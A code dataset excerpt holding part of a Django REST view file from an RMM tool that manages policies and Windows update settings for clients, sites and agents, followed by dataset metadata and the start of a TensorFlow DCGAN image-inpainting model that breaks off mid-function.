create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n\r\n # Check and see if workstation policy changed and regenerate policies\r\n if (\r\n not site.workstation_policy\r\n or site.workstation_policy\r\n and site.workstation_policy.pk != policy.pk\r\n ):\r\n site.workstation_policy = policy\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n # server policy is set\r\n if \"server_policy\" in request.data and request.data[\"server_policy\"] != 0:\r\n policy = get_object_or_404(Policy, pk=request.data[\"server_policy\"])\r\n\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check and see if server policy changed and regenerate policies\r\n if (\r\n not client.server_policy\r\n or client.server_policy\r\n and client.server_policy.pk != policy.pk\r\n ):\r\n client.server_policy = policy\r\n client.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n\r\n # Check and see if server policy changed and regenerate policies\r\n if (\r\n not site.server_policy\r\n or site.server_policy\r\n and site.server_policy.pk != policy.pk\r\n ):\r\n site.server_policy = policy\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.id},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n # If workstation policy was cleared\r\n if (\r\n \"workstation_policy\" in request.data\r\n and request.data[\"workstation_policy\"] == 0\r\n ):\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check if workstation policy is set and update it to None\r\n if client.workstation_policy:\r\n\r\n client.workstation_policy = None\r\n client.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n\r\n # Check if workstation policy is set and update it to None\r\n if site.workstation_policy:\r\n\r\n site.workstation_policy = None\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.id},\r\n mon_type=\"workstation\",\r\n create_tasks=True,\r\n )\r\n\r\n # server policy cleared\r\n if \"server_policy\" in request.data and request.data[\"server_policy\"] == 0:\r\n\r\n if related_type == \"client\":\r\n client = get_object_or_404(Client, pk=pk)\r\n\r\n # Check if server policy is set and update it to None\r\n if client.server_policy:\r\n\r\n client.server_policy = None\r\n client.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site__client_id\": client.id},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n if related_type == \"site\":\r\n site = get_object_or_404(Site, pk=pk)\r\n # Check if server policy is set and update it to None\r\n if site.server_policy:\r\n\r\n site.server_policy = None\r\n site.save()\r\n generate_agent_checks_by_location_task.delay(\r\n location={\"site_id\": site.pk},\r\n mon_type=\"server\",\r\n create_tasks=True,\r\n )\r\n\r\n # agent policies\r\n if related_type == \"agent\":\r\n agent = get_object_or_404(Agent, pk=pk)\r\n\r\n if \"policy\" in request.data and request.data[\"policy\"] != 0:\r\n policy = Policy.objects.get(pk=request.data[\"policy\"])\r\n\r\n # Check and see if policy changed and regenerate policies\r\n if not agent.policy or agent.policy and agent.policy.pk != policy.pk:\r\n agent.policy = policy\r\n agent.save()\r\n agent.generate_checks_from_policies()\r\n agent.generate_tasks_from_policies()\r\n else:\r\n if agent.policy:\r\n agent.policy = None\r\n agent.save()\r\n agent.generate_checks_from_policies()\r\n agent.generate_tasks_from_policies()\r\n\r\n return Response(\"ok\")\r\n\r\n # view to get policies set on client, site, and workstation\r\n def patch(self, request):\r\n related_type = request.data[\"type\"]\r\n\r\n # client, site, or agent pk\r\n pk = request.data[\"pk\"]\r\n\r\n if related_type == \"agent\":\r\n agent = Agent.objects.get(pk=pk)\r\n return Response(RelatedAgentPolicySerializer(agent).data)\r\n\r\n if related_type == \"site\":\r\n site = Site.objects.get(pk=pk)\r\n return Response(RelatedSitePolicySerializer(site).data)\r\n\r\n if related_type == \"client\":\r\n client = Client.objects.get(pk=pk)\r\n return Response(RelatedClientPolicySerializer(client).data)\r\n\r\n content = {\"error\": \"Data was submitted incorrectly\"}\r\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\r\n\r\n\r\nclass UpdatePatchPolicy(APIView):\r\n\r\n # create new patch policy\r\n def post(self, request):\r\n policy = get_object_or_404(Policy, pk=request.data[\"policy\"])\r\n\r\n serializer = WinUpdatePolicySerializer(data=request.data, partial=True)\r\n serializer.is_valid(raise_exception=True)\r\n serializer.policy = policy\r\n serializer.save()\r\n\r\n return Response(\"ok\")\r\n\r\n # update patch policy\r\n def put(self, request, patchpolicy):\r\n policy = get_object_or_404(WinUpdatePolicy, pk=patchpolicy)\r\n\r\n serializer = WinUpdatePolicySerializer(\r\n instance=policy, data=request.data, partial=True\r\n )\r\n serializer.is_valid(raise_exception=True)\r\n serializer.save()\r\n\r\n return Response(\"ok\")\r\n\r\n # bulk reset agent patch policy\r\n def patch(self, request):\r\n\r\n agents = None\r\n if \"client\" in request.data:\r\n agents = Agent.objects.prefetch_related(\"winupdatepolicy\").filter(\r\n site__client_id=request.data[\"client\"]\r\n )\r\n elif \"site\" in request.data:\r\n agents = Agent.objects.prefetch_related(\"winupdatepolicy\").filter(\r\n site_id=request.data[\"site\"]\r\n )\r\n else:\r\n agents = Agent.objects.prefetch_related(\"winupdatepolicy\").only(\"pk\")\r\n\r\n for agent in agents:\r\n winupdatepolicy = agent.winupdatepolicy.get()\r\n winupdatepolicy.critical = \"inherit\"\r\n winupdatepolicy.important = \"inherit\"\r\n winupdatepolicy.moderate = \"inherit\"\r\n winupdatepolicy.low = \"inherit\"\r\n winupdatepolicy.other = \"inherit\"\r\n winupdatepolicy.run_time_frequency = \"inherit\"\r\n winupdatepolicy.reboot_after_install = \"inherit\"\r\n winupdatepolicy.reprocess_failed_inherit = True\r\n winupdatepolicy.save(\r\n update_fields=[\r\n \"critical\",\r\n \"important\",\r\n \"moderate\",\r\n \"low\",\r\n \"other\",\r\n \"run_time_frequency\",\r\n \"reboot_after_install\",\r\n \"reprocess_failed_inherit\",\r\n ]\r\n )\r\n\r\n return Response(\"ok\")\r\n\r\n # delete patch policy\r\n def delete(self, request, patchpolicy):\r\n get_object_or_404(WinUpdatePolicy, pk=patchpolicy).delete()\r\n\r\n return Response(\"ok\")\r\n", "sub_path": "api/tacticalrmm/automation/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 16507, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 39, "usage_type": "name"}, {"api_name": "models.Policy.objects.all", "line_number": 41, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 43, "usage_type": "call"}, {"api_name": "serializers.PolicyTableSerializer", "line_number": 43, "usage_type": "call"}, {"api_name": "serializers.PolicySerializer", "line_number": 46, "usage_type": "call"}, {"api_name": "models.Policy.objects.get", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 52, "usage_type": "name"}, {"api_name": "checks.models", "line_number": 54, "usage_type": "name"}, {"api_name": "checks.models", "line_number": 55, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 63, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 68, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 70, "usage_type": "call"}, {"api_name": "serializers.PolicySerializer", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 73, "usage_type": "argument"}, {"api_name": "serializers.PolicySerializer", "line_number": 78, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_from_policies_task.delay", "line_number": 84, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_from_policies_task", "line_number": 84, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 89, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 92, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 92, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_from_policies_task.delay", "line_number": 95, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_from_policies_task", "line_number": 95, "usage_type": "name"}, {"api_name": "tasks.generate_agent_tasks_from_policies_task.delay", "line_number": 96, "usage_type": "call"}, {"api_name": "tasks.generate_agent_tasks_from_policies_task", "line_number": 96, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 99, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 102, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 106, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 106, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}, {"api_name": "serializers.AutoTaskPolicySerializer", "line_number": 107, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects.filter", "line_number": 111, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "autotasks.models.AutomatedTask", "line_number": 111, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "serializers.PolicyTaskStatusSerializer", "line_number": 112, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "autotasks.models.AutomatedTask.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "autotasks.models.AutomatedTask", "line_number": 116, "usage_type": "name"}, {"api_name": "tasks.run_win_policy_autotask_task.delay", "line_number": 117, "usage_type": "call"}, {"api_name": "tasks.run_win_policy_autotask_task", "line_number": 117, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 121, "usage_type": "name"}, {"api_name": "checks.models", "line_number": 123, "usage_type": "name"}, {"api_name": "checks.models.Check.objects.filter", "line_number": 123, "usage_type": "call"}, {"api_name": "checks.models.Check.objects", "line_number": 123, "usage_type": "attribute"}, {"api_name": "checks.models.Check", "line_number": 123, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 124, "usage_type": "call"}, {"api_name": "serializers.PolicyCheckSerializer", "line_number": 124, "usage_type": "call"}, {"api_name": "checks.models", "line_number": 124, "usage_type": "argument"}, {"api_name": "checks.models", "line_number": 127, "usage_type": "name"}, {"api_name": "checks.models.Check.objects.filter", "line_number": 127, "usage_type": "call"}, {"api_name": "checks.models.Check.objects", "line_number": 127, "usage_type": "attribute"}, {"api_name": "checks.models.Check", "line_number": 127, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 128, "usage_type": "call"}, {"api_name": "serializers.PolicyCheckStatusSerializer", "line_number": 128, "usage_type": "call"}, {"api_name": "checks.models", "line_number": 128, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 131, "usage_type": "name"}, {"api_name": "clients.models", "line_number": 134, "usage_type": "name"}, {"api_name": "clients.models.Client.objects.all", "line_number": 134, "usage_type": "call"}, {"api_name": "clients.models.Client.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "clients.models.Client", "line_number": 134, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 135, "usage_type": "call"}, {"api_name": "serializers.PolicyOverviewSerializer", "line_number": 135, "usage_type": "call"}, {"api_name": "clients.models", "line_number": 135, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 138, "usage_type": "name"}, {"api_name": "models.Policy.objects.filter", "line_number": 144, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 144, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 144, "usage_type": "name"}, {"api_name": "clients.serializers.ClientSerializer", "line_number": 157, "usage_type": "call"}, {"api_name": "clients.serializers.ClientSerializer", "line_number": 160, "usage_type": "call"}, {"api_name": "clients.serializers.SiteSerializer", "line_number": 172, "usage_type": "call"}, {"api_name": "clients.serializers.SiteSerializer", "line_number": 181, "usage_type": "call"}, {"api_name": "agents.serializers.AgentHostnameSerializer", "line_number": 185, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 203, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 206, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 206, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 217, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 217, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 224, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 224, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 234, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 234, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 242, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 242, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 245, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 245, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 255, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 255, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 262, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 262, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 272, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 272, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 284, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 284, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 291, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 291, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 298, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 298, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 305, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 305, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 315, "usage_type": "call"}, {"api_name": "clients.models.Client", "line_number": 315, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 322, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 322, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 329, "usage_type": "call"}, {"api_name": "clients.models.Site", "line_number": 329, "usage_type": "argument"}, {"api_name": "tasks.generate_agent_checks_by_location_task.delay", "line_number": 335, "usage_type": "call"}, {"api_name": "tasks.generate_agent_checks_by_location_task", "line_number": 335, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 343, "usage_type": "call"}, {"api_name": "agents.models.Agent", "line_number": 343, "usage_type": "argument"}, {"api_name": "models.Policy.objects.get", "line_number": 346, "usage_type": "call"}, {"api_name": "models.Policy.objects", "line_number": 346, "usage_type": "attribute"}, {"api_name": "models.Policy", "line_number": 346, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 361, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects.get", "line_number": 371, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 371, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 371, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 372, "usage_type": "call"}, {"api_name": "serializers.RelatedAgentPolicySerializer", "line_number": 372, "usage_type": "call"}, {"api_name": "clients.models.Site.objects.get", "line_number": 375, "usage_type": "call"}, {"api_name": "clients.models.Site.objects", "line_number": 375, "usage_type": "attribute"}, {"api_name": "clients.models.Site", "line_number": 375, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 376, "usage_type": "call"}, {"api_name": "serializers.RelatedSitePolicySerializer", "line_number": 376, "usage_type": "call"}, {"api_name": "clients.models.Client.objects.get", "line_number": 379, "usage_type": "call"}, {"api_name": "clients.models.Client.objects", "line_number": 379, "usage_type": "attribute"}, {"api_name": "clients.models.Client", "line_number": 379, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 380, "usage_type": "call"}, {"api_name": "serializers.RelatedClientPolicySerializer", "line_number": 380, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 383, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 383, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 383, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 386, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 390, "usage_type": "call"}, {"api_name": "models.Policy", "line_number": 390, "usage_type": "argument"}, {"api_name": "winupdate.serializers.WinUpdatePolicySerializer", "line_number": 392, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 397, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 401, "usage_type": "call"}, {"api_name": "winupdate.models.WinUpdatePolicy", "line_number": 401, "usage_type": "argument"}, {"api_name": "winupdate.serializers.WinUpdatePolicySerializer", "line_number": 403, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 409, "usage_type": "call"}, {"api_name": "agents.models", "line_number": 414, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 416, "usage_type": "name"}, {"api_name": "agents.models.Agent.objects.prefetch_related", "line_number": 416, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 416, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 416, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 420, "usage_type": "name"}, {"api_name": "agents.models.Agent.objects.prefetch_related", "line_number": 420, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 420, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 420, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 424, "usage_type": "name"}, {"api_name": "agents.models.Agent.objects.prefetch_related", "line_number": 424, "usage_type": "call"}, {"api_name": "agents.models.Agent.objects", "line_number": 424, "usage_type": "attribute"}, {"api_name": "agents.models.Agent", "line_number": 424, "usage_type": "name"}, {"api_name": "agents.models", "line_number": 426, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 449, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 453, "usage_type": "call"}, {"api_name": "winupdate.models.WinUpdatePolicy", "line_number": 453, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 455, "usage_type": "call"}]} +{"seq_id": "607127798", "text": "'''\n# model.py\n#\n# Implement DCGAN model\n'''\n\nimport time\nimport math\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom model_funcs import *\n \ndef conv_out_size_same(size, stride):\n return int(math.ceil(float(size) / float(stride)))\n \nclass DCGAN:\n def __init__(self, sess, input_height=64, input_width=64, batch_size=64, sample_num = 64, output_height=64, output_width=64,\n g_dim=[1024, 512, 256, 128], d_dim=[64, 128, 256, 512], s_size=4, y_dim=None, z_dim=100, dataset='SVHN'):\n '''\n Initialize variables for implementation and calculations\n Args:\n batch_size: The size of the batch\n g_dim: Dimensions of generator filters in conv layers, as an array\n d_dim: Dimensions of discriminator filters in conv layers, as an array\n \n '''\n self.sess = sess\n self.batch_size = batch_size\n self.sample_num = sample_num\n \n self.input_height = input_height\n self.input_width = input_width\n self.output_height = output_height\n self.output_width = output_width\n\n self.g_dim = g_dim + [3]\n self.d_dim = [3] + d_dim\n\n self.s_size = s_size\n self.y_dim = y_dim\n self.z_dim = z_dim\n \n self.dataset = dataset\n \n self.reuse = False\n \n \n self.z = tf.random_uniform([self.batch_size, self.z_dim], minval=-1.0, maxval=1.0)\n self.z_sum = tf.summary.histogram(\"z\", self.z)\n \n self.build_model()\n \n \n \n def inpainting(self,learning_rate,test_image,iterations,mask_choice='block_mask',lamda=0.002):\n '''\n Test of Semantic inpainting\n this function applies a mask\n to the input image and then produces a visually similar image to the original\n \n uses functions from utils\n Input Arguments\n test- a single test image\n Outputs\n outputs- predicted images to match masked images. traverses a manifold using back-propogation\n '''\n import numpy as np\n import tensorflow as tf\n from utils import block_mask\n from utils import random_mask\n from utils import half_missing_mask\n \n #apply mask to image and keep mask for later use\n self.image = test_image\n \n if mask_choice == 'block_mask':\n masked_test, mask = block_mask(self.image,30)\n elif mask_choice == 'random_mask':\n masked_test, mask = random_mask(self.image,0.6)\n elif mask_choice == 'half_missing_mask':\n masked_test, mask = half_missing_mask(self.image)\n else:\n print('incorrect mask choice')\n \n \n #reshape images and masks to be compatible with output from generator\n test_image = np.reshape(test_image,(1,64,64,3))\n mask = np.reshape(mask,(1,64,64,3))\n masked_test = np.reshape(masked_test,(1,64,64,3))\n \n #change image, mask and learning rate to tensors\n self.image = tf.convert_to_tensor(test_image, dtype=tf.float32)\n self.mask = tf.convert_to_tensor(mask,dtype=tf.float32)\n self.learning_rate = tf.convert_to_tensor(learning_rate,dtype=tf.float32)\n \n \n \n #generate random z as a changeable variable \n self.z = tf.random_uniform([1,100],minval=-1,maxval=1,dtype=tf.float32,seed=None,name='z')\n \n #generate weights for contextual loss\n weight = np.zeros_like(mask)\n n = weight.shape[1]\n for i in range(n):\n for j in range(n):\n if (j-4) > 0 and (j+4) < (n - 4) and (i-4) >0 and i+4 < (n - 4) and mask[0,i,j,0] ==1:\n cumulative_sum = 0;\n for k in range(-3,3):\n for l in range(-3,3):\n if mask[0,i+k,l+j,0] ==0 and l!=0 and k!=0:\n cumulative_sum = cumulative_sum + 1\n cumulative_sum = cumulative_sum/49\n weight[:,i,j,:] = cumulative_sum\n #convert to tensor\n self.weight = tf.convert_to_tensor(weight,dtype=tf.float32)\n \n \n \n #Define loss as sum of both types of loss\n self.weighted_context_loss = tf.reduce_sum( tf.abs( tf.multiply(self.weight , tf.multiply(self.generator(self.z),self.mask) - tf.multiply(self.image,self.mask) ) ) )\n self.perceptual_loss = self.g_loss \n self.complete_loss = self.weighted_context_loss + lamda*self.perceptual_loss\n \n #define optimization function (gradient descent)\n self.gradients = tf.gradients(self.complete_loss,self.z)\n \n #gradient descent back propogation to update input z\n tf.global_variables_initializer().run()\n for i in range(iterations):\n \n loss, g, Gz = self.sess.run([self.complete_loss,self.gradients,self.generator(self.z)])\n \n self.z = self.z - g[0]*learning_rate \n \n \n #rescale image Gz properly\n Gz = ((Gz + 1) / 2) * 255\n #crop out center and add it to test image\n fill = tf.multiply(tf.ones_like(self.mask) - self.mask,Gz)\n new_image = masked_test + fill\n \n return new_image \n \n \n def generator(self, inputs, training=False):\n '''\n Implementation of discriminator\n \n Input arguments:\n inputs - image \n \n Outputs:\n \n '''\n \n with tf.variable_scope('generator', reuse=tf.AUTO_REUSE):\n #reshape from inputs\n reshape_out = tf.layers.dense(inputs, self.g_dim[0] * self.s_size * self.s_size)\n reshape_out = tf.reshape(reshape_out, [-1, self.s_size, self.s_size, self.g_dim[0]])\n reshape_out = tf.nn.relu(tf.layers.batch_normalization(reshape_out, training=training), name='g_reshape')\n \n # deconv layer 1\n conv_1 = tf.layers.conv2d_transpose(reshape_out, self.g_dim[1], [5, 5], strides=(2, 2), padding='SAME')\n conv_1 = tf.nn.relu(tf.layers.batch_normalization(conv_1, training=training), name='g_conv_1')\n \n # deconv layer 2\n conv_2 = tf.layers.conv2d_transpose(conv_1, self.g_dim[2], [5, 5], strides=(2, 2), padding='SAME')\n conv_2 = tf.nn.relu(tf.layers.batch_normalization(conv_2, training=training), name='g_conv_2')\n \n # deconv layer 3\n conv_3 = tf.layers.conv2d_transpose(conv_2, self.g_dim[3], [5, 5], strides=(2, 2), padding='SAME')\n conv_3 = tf.nn.relu(tf.layers.batch_normalization(conv_3, training=training), name='g_conv_3')\n \n # deconv layer 4\n conv_4 = tf.layers.conv2d_transpose(conv_3, self.g_dim[4], [5, 5], strides=(2, 2), padding='SAME')\n \n #output images\n outputs = tf.tanh(conv_4, name='g_outputs') # Output shape is [batch_size (64), height (64), width (64), channels (3)]\n \n self.reuse = True\n self.variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='generator')\n return outputs\n \n def discriminator(self, inputs, training=False):\n '''\n Implementation of discriminator\n Uses functions from model_funcs.py\n \n Input arguments:\n inputs\n \n Outputs:\n \n '''\n inputs = tf.convert_to_tensor(inputs)\n \n #with tf.variable_scope('discriminator') as scope:\n with tf.variable_scope('discriminator', reuse=tf.AUTO_REUSE) as scope:\n # conv layer 1\n conv_1 = tf.layers.conv2d(inputs, self.d_dim[1], [5, 5], strides=(2, 2), padding='SAME')\n conv_1 = leaky_relu(tf.layers.batch_normalization(conv_1, training=training), name='d_conv_1')\n \n # conv layer 2\n conv_2 = tf.layers.conv2d(conv_1, self.d_dim[2], [5, 5], strides=(2, 2), padding='SAME')\n conv_2 = leaky_relu(tf.layers.batch_normalization(conv_2, training=training), name='d_conv_2')\n \n # conv layer 3\n conv_3 = tf.layers.conv2d(conv_2, self.d_dim[3], [5, 5], strides=(2, 2), padding='SAME')\n conv_3 = leaky_relu(tf.layers.batch_normalization(conv_3, training=training), name='d_conv_3')\n \n # conv layer 4\n conv_4 = tf.layers.conv2d(conv_3, self.d_dim[4], [5, 5], strides=(2, 2), padding='SAME')\n conv_4 = leaky_relu(tf.layers.batch_normalization(conv_4, training=training), name='d_conv_4')\n \n #reshape output\n batch_size = conv_4.get_shape()[0].value\n reshape = tf.reshape(conv_4, [batch_size, -1])\n outputs = tf.layers.dense(reshape, 2, name='d_outputs') # outputs shape is [batch_size, 2]\n \n self.reuse = True\n self.variables = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='discriminator')\n return outputs\n \n def build_model(self):\n '''\n build model, calculate losses\n '''\n # prep values to build model\n image_dims = [self.input_height, self.input_width, 3]\n self.inputs = tf.placeholder(tf.float32, [self.batch_size] + image_dims, name='real_images')\n inputs = self.inputs # tensor of shape [batch, height, width, channels]\n \n # build models\n generated = self.generator(self.z , training=True)\n g_outputs = self.discriminator(generated, training=True)\n t_outputs = self.discriminator(inputs, training=True)\n \n # Softmax cross entropy loss\n #g_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=g_outputs, labels=tf.zeros([self.batch_size]))\n g_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.ones([self.batch_size], dtype=tf.int64), logits=g_outputs)\n self.g_loss = tf.reduce_mean(g_loss)\n \n #d_loss_real = tf.nn.sigmoid_cross_entropy_with_logits(logits=t_outputs, labels=tf.ones([self.batch_size]))\n d_loss_real = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.ones([self.batch_size], dtype=tf.int64), logits=t_outputs)\n self.d_loss_real = tf.reduce_mean(d_loss_real)\n \n #d_loss_fake = tf.nn.softmax_cross_entropy_with_logits_v2(logits=g_outputs, labels=tf.zeros([self.batch_size]))\n d_loss_fake = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=tf.zeros([self.batch_size], dtype=tf.int64),logits=g_outputs)\n self.d_loss_fake = tf.reduce_mean(d_loss_fake)\n \n self.d_loss = self.d_loss_real + self.d_loss_fake\n \n\n def train(self, epochs=2, batch_size=245, learning_rate=0.0002, beta1=0.5, pre_trained_model=None):\n '''\n Input Args:\n batches - batches of images for training\n epochs\n batch_size\n save_every_n - \n \n Outputs:\n \n '''\n #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n #with tf.control_dependencies(update_ops):\n \n with tf.variable_scope('optim', reuse=tf.AUTO_REUSE):\n # using Adam optimizer as specified in the project paper\n d_optim = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=beta1).minimize(self.d_loss) #generator optimizer\n g_optim = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=beta1).minimize(self.g_loss) # discriminator optimizer\n \n counter = 0\n cur_model_name = 'DCGAN_{}'.format(int(time.time()))\n \n tf.global_variables_initializer().run()\n writer = tf.summary.FileWriter(\"log/{}\".format(cur_model_name), self.sess.graph)\n saver = tf.train.Saver()\n \n start_time = time.time()\n \n if pre_trained_model is not None:\n try:\n print(\"Load the model from: {}\".format(pre_trained_model))\n saver.restore(sess, 'model/{}'.format(pre_trained_model))\n except Exception:\n raise ValueError(\"Load model Failed!\")\n \n \n # run\n #with tf.Session() as sess:\n # sess.run(init)\n \n #generate batches based on which dataset is being used\n #if self.data_set == '': --> uncomment if needed\n batches, iters = get_batches(batch_size, 